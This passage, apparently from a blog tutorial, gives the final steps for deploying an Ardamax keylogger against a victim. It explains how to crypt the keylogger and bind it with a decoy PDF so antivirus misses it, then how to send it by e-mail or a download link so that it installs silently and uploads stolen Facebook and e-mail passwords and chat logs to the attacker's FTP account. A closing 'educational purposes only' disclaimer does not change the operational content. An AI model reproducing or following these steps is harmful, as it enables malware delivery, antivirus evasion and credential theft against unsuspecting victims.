6. If everything went correctly you now have a server file (the keylogger). Antivirus detects this file easily, so it is bound and crypted: open the crypter you downloaded, select the server file as file 1 and a harmless application as file 2 (a PDF works well as the decoy), and click Crypt File. The result is a crypted server file that the crypter calls FUD, fully undetectable by antivirus, which in practice holds only until the crypter's stub is itself signatured.

7. Send the crypted server file to the victim by e-mail, or upload it somewhere and ask the victim to download it. Once the victim runs it, Ardamax installs silently and sends its logs (Facebook and e-mail passwords, chat logs, etc.) to your FTP account, where you can read them.

THUS RATs ARE CREATED AND USED TO TAKE CONTROL OF VICTIMS' COMPUTERS
This is a simple and very effective method of compromising a remote computer. If you have any doubts, feel free to post a comment.

Note:
This is for educational purposes only. Using a RAT to control a system without authorisation is a crime, so do not do it. (Reading about or discussing a technique is not a crime; carrying it out against others is.)

Soon I will post on how to find out whether you are the victim of a RAT, and how to hack a hacker.